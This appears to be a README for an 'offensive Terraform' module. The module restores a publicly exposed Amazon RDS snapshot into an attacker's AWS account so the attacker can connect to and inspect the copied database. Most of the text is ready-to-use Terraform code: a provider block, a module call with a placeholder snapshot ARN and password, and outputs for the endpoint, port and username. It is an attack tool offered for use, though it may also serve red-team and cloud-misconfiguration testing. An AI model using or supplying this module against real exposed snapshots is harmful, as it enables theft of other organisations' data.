Offensive Terraform module which creates RDS database from a publicly exposed RDS snapshot in attacker's AWS account. After that, attacker can connect to RDS database and inspect it.
Note: The provider region must be same as publicly exposed RDS snapshot's region.
provider "aws" {
region = "us-east-1"
}
module "rds-snapshot-publicly-exposed" {
source = "offensive-terraform/rds-snapshot-publicly-exposed/aws"
rds_snapshot_arn = "arn:aws:rds:region:0000000000:snapshot:name"
rds_db_password = "password"
}
output "rds_endpoint" {
value = module.rds-snapshot-publicly-exposed.rds_endpoint
}
output "rds_port" {
value = module.rds-snapshot-publicly-exposed.rds_port
}
output "rds_username" {
value = module.rds-snapshot-publicly-exposed.rds_username
}
Module managed by https://github.com/iganbold